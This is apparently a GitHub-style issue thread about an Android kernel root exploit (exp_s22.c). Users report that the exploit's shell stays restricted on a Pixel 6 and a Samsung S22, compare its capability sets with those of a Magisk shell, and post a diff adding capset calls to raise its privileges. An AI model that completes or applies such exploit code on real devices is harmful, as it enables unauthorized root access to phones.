ls: .: Permission denied

[stevejubs]

Thank you for the exploit. However, the root shell returns 'Permission denied' on Pixel 6. I need to know the root cause of the problem.

[ye4ah4]

Hi, I encountered the same issue on the Samsung S22 and also failed to find the root cause or a solution.

[ye4ah4]

Hi,

I used a root shell obtained with Magisk to check the process capabilities: r0q:/ # cat /proc/self/status | grep Cap CapInh: 0000000000000000 CapPrm: 000001ffffffffff CapEff: 000001ffffffffff CapBnd: 000001ffffffffff CapAmb: 0000000000000000

But with the root shell obtained using the exploit, the process capabilities are: r0q:/data/local/tmp # cat /proc/self/status | grep Cap CapInh: 0000000000000000 CapPrm: 00000000000000c0 CapEff: 00000000000000c0 CapBnd: 00000000000000c0 CapAmb: 0000000000000000

Could this be the reason? Thank you. I am attempting to modify the capabilities of the exploit to be similar to Magisk's capabilities, but I am not very familiar with the code, and I haven't succeeded in making the changes yet.

Best Wishes

[ye4ah4]

I tried to modify the cap as follows, but it failed, saying that the permissions were insufficient.

--- a/exp_s22.c +++ b/exp_s22.c @@ -38,6 +38,7 @@

include <sys/socket.h>

+#include <sys/capability.h>

define MAX_PIPE_NUM 0x400

define MAX_256_PIPE 0x400

void exploit(void) { setuid(0); seteuid(0);

• struct __user_cap_header_struct hdr;
• struct __user_cap_data_struct ucdata;
• hdr.version = _LINUX_CAPABILITY_VERSION; //setcaps
• hdr.pid = getpid();
• ucdata.effective = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));
• ucdata.permitted = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));
• ucdata.inheritable = 0xffffffff;
• if (-1 == capset(&hdr, &ucdata)) {
• printf("cap strerror(errno) %s\n",strerror(errno));

• }

  printf("cap now uid/gid: %d/%d\n", getuid(), getgid()); system("/system/bin/sh"); ~

when exp cred is overwritten cap strerror(errno) Operation not permitted cap now uid/gid: 0/0